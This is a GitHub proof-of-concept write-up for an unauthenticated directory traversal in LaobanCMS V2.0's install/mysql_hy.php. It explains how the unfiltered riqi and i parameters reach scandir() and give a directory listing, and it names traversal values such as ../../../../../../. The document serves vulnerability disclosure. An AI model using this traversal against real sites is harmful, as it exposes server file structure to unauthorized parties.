##Poc of Directory Traversal in LaobanCMS V2.0
###Precondition
Do not need to login the cms, make sure the file xxx.com/install/mysql_hy.php is exists (http code is 200) then the Vulnerability can be use.
###Details
In install/mysql_hy.php, the developer didn't filter the parameter $riqi and $i before using.
See the pic below
In line 6, we can see the parameter $riqi is join with ../data/ as the result of parameter $sql_path.
In line 7, the $sql_path use as the parameter of PHP function scandir()
In php, scandir() is used to list files and directories inside the specified path, and return an array of files and directories from the directory.
In line 9, the $i in $sqls[$i] is defined in line 5, and the attacker can control it. And the result of $sqls[$i] is given to $table.
In line 11, you can see, the parameter $table is echo directly.
###construction of poc
the poc use two parameter in the url requesting arguments towards install/mysql_hy.php
riqi --> the directory you want to attack
i --> the index use in php function scandir()
In the picture below, i use ../../../../../../ as riqi and 3 - 8 as the index i. And my test server is ubuntu, so, you can see the folder name of the parent path.(like boot, boot, dev, etc)

Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
poc/laobancms/poc.md
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
20 lines (20 sloc)
1.46 KB

